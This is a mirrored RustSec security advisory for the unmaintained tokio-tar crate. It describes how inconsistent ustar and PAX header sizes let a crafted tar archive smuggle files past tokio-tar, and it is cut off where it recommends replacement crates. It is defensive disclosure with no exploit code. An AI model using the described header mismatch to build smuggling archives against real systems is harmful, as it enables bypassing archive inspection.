rustsec/advisory-db
1
0
Fork 0
mirror of https://github.com/rustsec/advisory-db.git synced 2025-12-27 01:54:07 -05:00
Code Issues Packages Projects Releases Wiki Activity
Files
main
advisory-db/crates/tokio-tar/RUSTSEC-2025-0111.md

1.2 KiB
Raw Permalink Blame History 

[advisory]
id = "RUSTSEC-2025-0111"
package = "tokio-tar"
date = "2025-10-21"
url = "https://edera.dev/stories/tarmageddon"
categories = ["format-injection"]
keywords = ["unsound", "parsing", "smuggling", "file-smuggling", "unmaintained"]
related = ["CVE-2025-62518", "GHSA-j5gw-2vrg-8fgx"]

[affected.functions]
"tokio_tar::Archive::new" = ["<= 0.3.1"]
"tokio_tar::ArchiveBuilder::new" = ["<= 0.3.1"]

[versions]
patched = []

tokio-tar parses PAX extended headers incorrectly, allows file smuggling

The archive reader incorrectly handles PAX extended headers, when the ustar header incorrectly specifies zero size (size=000000000000), while a PAX header specifies a non-zero size, tokio-tar::Archive is going to read the file content as tar entry header.

This can be used by a tar file to present different content to tokio-tar compared to other tar reader implementations.

This bug is also known as CVE-2025-62518 and GHSA-j5gw-2vrg-8fgx, as those crates share a common ancestor codebase.

The tokio-tar crate is archived and no longer maintained, we recommend you switch to an alternative crate such as: